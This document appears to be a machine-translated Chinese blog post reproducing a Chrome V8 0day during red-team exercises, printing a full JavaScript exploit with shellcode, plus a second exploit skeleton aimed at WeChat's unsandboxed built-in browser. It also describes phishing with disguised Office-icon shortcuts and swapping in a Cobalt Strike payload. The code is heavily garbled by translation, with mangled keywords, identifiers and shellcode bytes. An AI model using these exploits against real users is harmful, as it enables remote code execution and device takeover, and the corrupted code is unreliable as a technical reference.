Chrome 0Day 复现与思考
1 漏洞复现
在HW时期,Chrome 0day显示出来,并重新出现。记事本的POC:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
脚本
功能gc(){
for(var i=0; i0x80000; ++ i){
var a=new ArrayBuffer();
}
}
LET shellCode=[0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x00,0x41,0x41,0x51,0x41,0x41,0x50,0x50,0x52,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x51,
0x56,0x48,0x31,0xd2,0x65,0x48,0x48,0x8b,0x52,0x60,0x48,0x48,0x8b,0x52,0x18,0x48,0x48,0x48,0x8b,0x8b,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x52,0x18b
0x20,0x48,0x8b,0x72,0x50,0x48,0x48,0x0f,0xB7,0x4a,0x4a,0x4a,0x4d,0x4d,0x31,0xc9,0x48,0x48,0x31,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc9
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x2c,0x20,0x41,0xc1,0xc1,0xc9,0x0d,0x41,0x41,0x01,0xc1,0xc1,0xe2,0xe2,0xed,0xed,0xed,0xed,0xed,0xed,0xe
0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x20,0x8b,0x42,0x3c,0x48,0x48,0x01,0xd0,0x8b,0x8b,0x80,0x80,0x88,0x88,0x88,0x88,0x88,0x88,0x80
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x48,0x01,0xd0,0x50,0x50,0x8b,0x48,0x18,0x18,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x48
0x8B,0x40,0x20,0x49,0x01,0xD0,0xE3,0x56,0x48,0xFF,0xC9,0x41,0x8B,0x34,0x88,0x48,
0x01,0xD6,0x4D,0x31,0xC9,0x48,0x31,0xC0,0xAC,0x41,0xC1,0xC9,0x0D,0x41,0x01,0xC1,
0x38,0xe0,0x75,0xf1,0x4c,0x4c,0x03,0x4c,0x24,0x08,0x45,0x39,0x39,0xd1,0x75,0xd8,0xd8,0x58,0x58,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0x44,0xd1
0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x41,0x8b,0x0c,0x48,0x48,0x44,0x44,0x8b,0x40
0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x48,0x01,0xd0,0x41,0x41,0x58,0x41,0x58,0x58,0x5e,0x5E,0x59,0x59,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5A,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5a,0x5
0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x48,0x83,0xec,0x20,0x41,0x41,0x52,0x52,0xff,0xe0,0x58,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41,0x41
0x59,0x5a,0x48,0x8b,0x12,0xe9,0x57,0x57,0xff,0xff,0xff,0xff,0x5d,0x48,0x48,0xba,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x00,0x00,0x48,0x48,0x8d,0x8d,0x01,0x01,0x01,0x01,0x00,0x00,0x41,0x41,0xba,0xba,0x31,0x31,0x8b,0x8b,0x8b,
0x6f,0x87,0xff,0xD5,0xBb,0xf0,0xb5,0xa2,0x56,0x41,0x41,0xba,0xa6,0x95,0x95,0xbd,0x9d,0x9d,0x9d,0xff,0xff,0xff,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x28,0x3c,0x06,0x7c,0x0a,0x0a,0x80,0xfb,0xe0,0x75,0x75,0x05,0x05,0xBB,0xbb,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0x47,0xBB
0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xda,0xd5,0xd5,0x6e,0x6e,0x6f,0x74,0x65,0x65,0x70,0x70,0x70,0x70,0x70,0x74
0x61,0x64,0x2e,0x65,0x78,0x65,0x00];
var wasmcode=new uint8array([[0,97,115,109,1,0,0,0,0,0,0,0,1,133,128,128,128,128,0,0,1,1,96,0,11,127,127,3,130,130,130,128,128,128,128,128,128,128,128,0 128,128,0,1,0,1,6,6,128,128,128,128,128,0,0,0,7,7,145,145,128,128,128,21 128,2,2,6,6,6,109,101,101,101,111,114,114,121,214,121,2,2,2,0 11]);
var wasmmodule=new webAssembly.module(wasmcode);
var wasminstance=new webAssembly.instance(wasmmodule);
var main=wasminstance.exports.main;
var bf=new ArrayBuffer(8);
var bfview=new Dataview(bf);
功能流(F){
bfview.setfloat64(0,f,true);
返回(bfview.getuint32(0,true));
}
功能FHI(F){
bfview.setfloat64(0,f,true);
返回(bfview.getuint32(4,true))
}
功能i2f(low,hi){
bfview.setuint32(0,low,true);
bfview.setuint32(4,hi,true);
返回bfview.getFloat64(0,true);
}
功能f2big(f){
bfview.setfloat64(0,f,true);
返回bfview.getBiguint64(0,true);
}
功能big2f(b){
bfview.setbiguint64(0,b,true);
返回bfview.getFloat64(0,true);
}
类LeakarayBuffer扩展了ArrayBuffer {
构造函数(size){
超级(大小);
this.slot=0xb33f;
}
}
功能foo(a){
令x=-1;
if(a)x=0xffffff;
var arr=new Array(Math.sign(0 -Math.max(0,x,-1)));
arr.shift();
令local_arr=array(2);
local_arr [0]=5.1; //4014666666666666
令buff=new LeakarRayBuffer(0x1000); //bytelength IDX=8
arr [0]=0x1122;
返回[arr,local_arr,buff];
}
for(var i=0; i0x10000; ++ i)
foo(false);
gc(); gc();
[corprput_arr,rwarr,dround_buff]=foo(true);
Corrput_arr [12]=0x22444;
删除Corrput_arr;
功能挫折store(hi,low){
rwarr [4]=i2f(flow(rwarr [4]),hi);
rwarr [5]=i2f(low,fhi(rwarr [5]));
}
函数leak objlow(o){
rustal_buff.slot=o;
返回(flow(rwarr [9]) - 1);
}
令dround_view=new Dataview(rupts_buff);
令ROUTTEN_BUFFER_PTR_LOW=LeakObjlow(Robs_Buff);
令IDX0ADDR=ROUTTEN_BUFFER_PTR_LOW -0x10;
令BASEADDR=(ROUTTER_BUFFER_PTR_LOW0xFFFF0000) - ((rustaD_buffer_ptr_low0xffff0000)%0x40000) +0x40000;
令delta=baseaddr +0x1c -idx0Addr;
if(((delta%8)==0){
令baseIdx=delta/8;
this.base=flow(rwarr [baseIdx]);
} 别的{
令baseIdx=((delta-(delta%8))/8);
this.base=fhi(rwarr [baseIdx]);
}
令WasminsAddr=LeakObjlow(Wasminstance);
setbackingstore(wasminsaddr,this.base);
令code_entry=rust_view.getfloat64(13 * 8,true);
setbackingstore(flow(code_entry),fhi(code_entry));
for(让i=0; i shellCode.length; i ++){
rustas_view.setuint8(i,shellCode );
}
主要的();
/脚本
先决条件是关闭Chrome的沙盒模式:
执行poc.html:
快捷方式钓鱼,只需更改办公室图标:
在线CS:
生成64位有效载荷,然后将格式转换为:
执行POC并成功启动:
2 思考
Windows Wechat客户端下的内置Chrome浏览器默认情况下关闭沙盒模式,但它是32位。如果有32位有效载荷,您可以将客户赢得胜利。3 后续补充
Windows微信客户有效载荷:1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
enable_log=true;
in_worker=true;
//输入您的shellCode
var shellCode=[0x00,0x00];
功能打印(数据){
}
var not_optimised_out=0;
var target_function=(function(value){
if(value==0xdecaf0){
not_optimised_out +=1;
}
not_optimised_out +=1;
not_optimised_out |=0xff;
not_optimised_out *=12;
});
for(var i=0; i0x10000; ++ i){
target_function(i);
}
var g_array;
var tderivedncount=17 * 87481-8;
var tderivedndepth=19 * 19;
功能CB(flag){
如果(flag==true){
返回;
}
g_array=new Array(0);
g_array [0]=0x1dbabe * 2;
返回'c01db33f';
}
功能gc(){
for(var i=0; i0x10000; ++ i){
new String();
}
}
函数oobaccess(){
var this_=this;
this.buffer=null;
this.buffer_view=null;
this.page_buffer=null;
this.page_view=null;
this.prevent_opt=[];
var kslotoffset=0x1f;
var kbackingstoreoffset=0xf;
类LeakarayBuffer扩展了ArrayBuffer {
constructor(){
超级(0x1000);
this.slot=this;
}
}
this.page_buffer=new LeakArarayBuffer();
this.page_view=new Dataview(this.page_buffer);
new Regexp({ToString: function(){return'A'}});
CB(true);
class derivedbase扩展了regexp {
constructor(){
//var array=null;
极好的(
//此时,jsregexp的4字节分配this`对象
//刚刚发生。
{
Tostring: CB
},'g'
//现在称为运行时jsregexp构造函数,损坏
//jsarray。
);
//此分配现在将直接遵循固定阶层分配
//为`this.data'制作,这是`array.elements'指向的位置。
this_.buffer=new ArrayBuffer(0x80);
g_array [8]=this_.page_buffer;
}
}
//尝试{
var derived_n=eval(`(函数derived_n(i){
如果(i==0){
返回派生键;
}
类派生的类扩展了derived_n(i-1){
constructor(){
极好的();
返回;
$ {'this.a=0;'。重复(tderivedncount)}
}
}
返回派生;
})`);
gc();
new(derived_n(tderivedndepth))();
this.buffer_view=new Dataview(this.buffer);
this.leakptr=function(obj){
this.page_buffer.slot=obj;
返回this.buffer_view.getUint32(kslotoffset,true, this.prevent_opt);
}
this.setptr=function(addr){
this.buffer_view.setuint32(kbackingstoreoffset,addr,true, this.prevent_opt);
}
this.read32=function(addr){
this.setptr(addr);
返回this.page_view.getUint32(0,true, this.prevent_opt);
}
